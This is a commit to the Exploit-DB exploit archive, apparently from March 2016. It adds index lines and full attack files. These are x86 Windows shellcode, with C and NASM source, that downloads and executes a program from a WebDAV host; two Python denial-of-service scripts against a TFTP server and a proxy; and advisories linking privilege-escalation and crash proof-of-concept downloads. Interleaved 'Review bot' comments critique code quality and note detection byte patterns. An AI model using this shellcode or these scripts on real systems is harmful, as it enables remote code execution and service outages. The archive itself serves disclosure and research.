DB: 2016-03-03

5 new exploits
Offensive Security 2016-03-03 05:02:14 +00:00
parent 7f6ad99482
commit 04bd5476ad
6 changed files with 285 additions and 0 deletions


@ -35753,3 +35753,8 @@ id,file,description,date,author,platform,type,port
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
39519,platforms/win32/shellcode/39519.c,"x86 Windows Null-Free Download & Run via WebDAV Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win32,shellcode,0
39520,platforms/win64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win64,local,0


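--- a/platforms/win32/shellcode/39519.c
+++ b/platforms/win32/shellcode/39519.c
@@ -0,0 +1,144 @@
+/*
+* Author: Sean Dillon
+* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+* Release Date: March 1, 2016
+*
+* Description: x86 Windows null-free download & run via WebDAV shellcode
+* Assembled Size: 96 bytes
+* Tested On: Windows XP, Windows 10
+* License: http://opensource.org/licenses/MIT
+*
+* Build/Run: MSVC with /NXCOMPAT:NO in Propertes->Linker->Advanced->DEP
+*/
+/*
+* NOTE: This C code connects to WebDAV at \\192.168.1.19:80/c to download and execute an .exe.
+* The WinExec() API downloads and runs dirty files from UNC paths with the "WebClient" daemon.
+* The end of this file contains the .nasm source code and instructions for building from that.
+*/
+#include <stdio.h>
+#include <string.h>
+char shellcode[] =
+"\x6a\x30" /* push $0x30 */
+"\x5e" /* pop %esi */
+"\x64\xad" /* lods %fs:(%esi),%eax */
+"\x8b\x40\x0c" /* mov 0xc(%eax),%eax */
+"\x8b\x70\x0c" /* mov 0xc(%eax),%esi */
+"\xad" /* lods %ds:(%esi),%eax */
+"\x8b\x10" /* mov (%eax),%edx */
+"\x8b\x5a\x18" /* mov 0x18(%edx),%ebx */
+"\x89\xd9" /* mov %ebx,%ecx */
+"\x03\x49\x3c" /* add 0x3c(%ecx),%ecx */
+"\x8b\x49\x78" /* mov 0x78(%ecx),%ecx */
+"\x01\xd9" /* add %ebx,%ecx */
+"\x8b\x41\x20" /* mov 0x20(%ecx),%eax */
+"\x01\xd8" /* add %ebx,%eax */
+"\x31\xd2" /* xor %edx,%edx */
+"\x52" /* push %edx */
+"\x5f" /* pop %edi */
+"\x8b\x34\x90" /* mov (%eax,%edx,4),%esi */
+"\x01\xde" /* add %ebx,%esi */
+"\x42" /* inc %edx */
+"\x81\x3e\x57\x69\x6e\x45" /* cmpl $0x456e6957,(%esi) */
+"\x75\xf2" /* jne 24 <find_winexec> */
+"\x8b\x71\x24" /* mov 0x24(%ecx),%esi */
+"\x01\xde" /* add %ebx,%esi */
+"\x66\x8b\x14\x56" /* mov (%esi,%edx,2),%dx */
+"\x8b\x71\x1c" /* mov 0x1c(%ecx),%esi */
+"\x01\xde" /* add %ebx,%esi */
+"\x8b\x74\x96\xfc" /* mov -0x4(%esi,%edx,4),%esi */
+"\x01\xde" /* add %ebx,%esi */
+"\x57" /* push %edi */
+"\x68\x31\x39\x2f\x63" /* push $0x632f3931 */
+"\x68\x38\x2e\x31\x2e" /* push $0x2e312e38 */
+"\x68\x32\x2e\x31\x36" /* push $0x36312e32 */
+"\x68\x5c\x5c\x31\x39" /* push $0x39315c5c */
+"\x54" /* push %esp */
+"\xff\xd6" /* call *%esi */
+"\xeb\xfe"; /* jmp 5e <spin> */
+int main()
+{
+printf("Shellcode length: %d\n", (int)strlen(shellcode));
+(*(void(*)(void))&shellcode)();
+return 0;
+}
+/* --------------------------------------------------------------------------------------
+* Author: Sean Dillon
+* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+* Release Date: March 1, 2016
+*
+* Description: x86 Windows null-free download & run via WebDAV shellcode
+* Assembled Size: 96 bytes
+* Tested On: Windows XP, Windows 10
+* License: http://opensource.org/licenses/MIT
+;
+; Build/Run: nasm -o webdav.o webdav.nasm
+; ld -o webdav webdav.o
+; objdump -d webdav
+BITS 32
+global _start
+section .text
+push 0x30 ; PEB offset
+pop esi
+db 0x64 ; dword ptr fs : []
+lodsd ; eax = NtCurrentTeb()->ProcessEnvironmentBlock
+mov eax, [eax + 0x0c] ; eax = PEB->Ldr
+mov esi, [eax + 0x0c] ; eax = PEB->Ldr.InLoadOrder
+lodsd
+mov edx, [eax]
+mov ebx, [edx + 0x18] ; ebx = GetModuleHandle(L"kernel32.dll")
+mov ecx, ebx ; ecx = (IMAGE_DOS_HEADERS *)ebx
+add ecx, [ecx + 0x3c] ; ecx = ecx->e_lfanew
+mov ecx, [ecx + 0x78] ; ecx = ecx->OptionalHeader.DataDirectory[0].VirtualAddress
+add ecx, ebx ; ecx = IMAGE_EXPORT_DIRECTORY
+mov eax, [ecx + 0x20] ; eax = ecx->AddressOfNames
+add eax, ebx
+xor edx, edx ; edx = 0
+push edx
+pop edi ; edi = 0
+find_winexec:
+mov esi, [eax + edx * 4] ; esi = ExportNamePointerTable[edx]
+add esi, ebx
+inc edx ; ++edx
+cmp dword [esi], 0x456e6957 ; if (memcmp(esi, "WinE", 4) != 0)
+jne find_winexec ; goto find_winexec
+mov esi, [ecx + 0x24] ; esi = ecx->AddressOfNameOrdinals
+add esi, ebx
+mov dx, [esi + edx * 2] ; dx = ExportOrdinalTable[edx]
+mov esi, [ecx + 0x1c] ; esi = ecx->AddressOfFunctions
+add esi, ebx ;
+mov esi, [esi + edx * 4 - 4] ; esi = &WinExec()
+add esi, ebx
+push edi ; '\0'
+push 0x632f3931
+push 0x2e312e38
+push 0x36312e32
+push 0x39315c5c
+push esp ; ss = \\192.168.1.19/c
+; Python2 one-liner to generate host string stack pushes
+; "0x"+"\n0x".join(map(''.join, zip(*[iter('\\\\192.168.1.19/c'[::-1].encode('hex'))]*8)))
+call esi
+spin: ; loop forever, downloaded process has taken over
+jmp spin ; second stage can clean up
+;--------------------------------------------------------------------------------------*/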
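Review bot: The comment on `mov esi, [eax + 0x0c]` in the NASM listing names the wrong register — the instruction writes esi, not eax — so it should read `mov esi, [eax + 0x0c] ; esi = PEB->Ldr.InLoadOrderModuleList.Flink`. In the C harness, `int main()` should be `int main(void)`, and `(*(void(*)(void))&shellcode)();` converts a pointer-to-array into a function pointer, which standard C does not define; it only works because the build notes switch DEP off, and a one-line comment saying exactly that next to the call would spare the next reader the question. The export-name loop has no upper bound on `edx`, so if no name beginning with `"WinE"` is present the scan runs past `AddressOfNames` and faults — a comment on `find_winexec:` stating that the loop assumes kernel32 exports WinExec would make that assumption explicit. From the defensive side, the listing's fixed byte sequences (the `64 ad 8b 40 0c` PEB walk and the `81 3e 57 69 6e 45` name compare) are the parts of the sample a reference header could point out as what makes this family recognisable.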

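--- a/platforms/win64/local/39520.txt
+++ b/platforms/win64/local/39520.txt
@@ -0,0 +1,14 @@
+Source: https://github.com/Cr4sh/secretnet_expl
+Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit.
+0day vulnerabilities in sncc0.sys kernel driver of Secrity Code products allows attacker to perform local privileges escalation from Guest to Local System. Also, attacker that has access to any Windows system may manually install sncc0.sys (that has valid digital signature from Security Code) and exploit it's vulnerability to bypass DSE and load unsigned kernel mode drivers on Windows x64 platforms.
+For detailed vulnerability analysis and explanation of how sncc0_00220010_expl code works please read Windows DSE bypass part of my article "Exploiting SMM callout vulnerabilities in Lenovo firmware".
+This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SMEP enabled systems you have to manually restore original value of CR4 register to avoid PatchGuard bugchecks, for real life usage example please check my fwexpl project.
+Proof of Concept:
+https://github.com/Cr4sh/secretnet_expl/archive/master.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39520.zip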

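--- a/platforms/windows/dos/39516.py
+++ b/platforms/windows/dos/39516.py
@@ -0,0 +1,52 @@
+# Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
+# Date: 21/01/2016
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: https://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
+# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
+# Version: 2.3
+# Tested on: Windows 7 Family x64 (FR)
+# Category: DoS
+"""
+Disclosure Timeline:
+--------------------
+2016-01-21: Vulnerability discovered
+2016-01-24: Vendor contacted
+2016-01-29: Vendor contacted again (no answer)
+2016-03-01: Vulnerability published
+Description :
+-------------
+A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
+the application, thus causing a Denial of Service.
+Instructions:
+-------------
+- Starts Quick Tftp Server Pro 2.3
+- Run this exploit locally or from your remote attacking machine
+"""
+import socket
+host = "192.168.135.132"
+port = 69
+request = "\x00\x01" # TFTP Read Request (RRQ)
+file = "file.txt"
+mode = '\x41' * 1024 # Overflow
+buffer = request + file + "\x00" + mode + "\x00"
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
+s.sendto(buffer, (host, port))
+s.close()
+print "[*] Done."
+except:
+print "[-] Error connecting"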
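Review bot: The bare `except:` at the end swallows every exception, including KeyboardInterrupt and a mistyped name, and its message `[-] Error connecting` is misleading for a UDP socket that never connects; `except socket.error as e:` followed by `print "[-] Error sending: %s" % e` reports what actually failed. The socket is also left open when `sendto` raises — create it before the `try` and close it in a `finally:` block. `file` shadows the Python 2 builtin of that name and would read better as `filename`. Since RFC 1350 fixes the RRQ mode field to a few short ASCII tokens, the Description block could note that a mode field of 1024 bytes is well outside anything a conforming client sends, which is the observable that a network check for this crash would rely on. The same bare `except:` appears in `platforms/windows/dos/39517.py`.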

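--- a/platforms/windows/dos/39517.py
+++ b/platforms/windows/dos/39517.py
@@ -0,0 +1,55 @@
+# Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS
+# Date: 01/03/2016
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: https://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.handcraftedsoftware.org/
+# Software Link: http://www.handcraftedsoftware.org/index.php?page=download&op=getFile&id=2&title=FreeProxy-Internet-Suite
+# Version: 4.10.1751
+# Tested on: Windows 7 Family x64 (FR)
+# Category: DoS
+"""
+Disclosure Timeline:
+--------------------
+2016-01-29: Vulnerability discovered
+2016-01-30: Vendor contacted
+2016-03-01: Vulnerability published
+Description :
+-------------
+A remote Denial Of Service exists in Freeproxy Internet Suite 4.10.1751 when sending a GET request to the proxy with an overly long URL.
+Instructions:
+-------------
+- Starts Freeproxy Internet Suite
+- Run this exploit locally or from your remote attacking machine. Multiple sends may be necessary to crash the application.
+"""
+import socket
+host = "192.168.135.132"
+port = 8080
+junk = '\x41' * 5000
+buffer = "GET http://::../%s/index.html HTTP/1.1\r\n" % junk
+buffer += "Host: www.google.fr\r\n"
+buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
+buffer += "\r\n\r\n"
+try:
+print "[*] Connecting to %s:%d" % (host, port)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[*] Sending buffer %d bytes..." % len(junk)
+s.connect((host, port))
+s.send(buffer)
+s.close()
+print "[*] Done."
+except:
+print "[-] Error connecting"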
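Review bot: `print "[*] Sending buffer %d bytes..." % len(junk)` reports the size of the padding, not of the request that is actually written; `len(buffer)` is the value the log line claims to print. `s.send(buffer)` on a stream socket may deliver only part of a ~5 KB request and returns the count sent, which is discarded here before `s.close()`, so a truncated request goes unnoticed; `s.sendall(buffer)` sends the whole buffer or raises. A short comment above the `buffer =` line stating that the `::..` prefix and the 5000-byte path are what the Description section refers to as the overly long URL would tie the code back to the advisory text.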

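--- a/platforms/windows/dos/39518.txt
+++ b/platforms/windows/dos/39518.txt
@@ -0,0 +1,15 @@
+# Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC
+# Date: 01-03-2016
+# Exploit Author: redknight99
+# Vendor Homepage: http://www.picturetrail.com/
+# Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe
+# Version: 2.0.0
+# Tested on: Windows 7, 10
+# CVE : Unknown
+Picture Trail Photo editor fails to properly parse .bmp header height and width values.
+Negative height and width values cause a program crash (memory corruption) and SEH corruption. Remote code execution may be possible.
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39518.zip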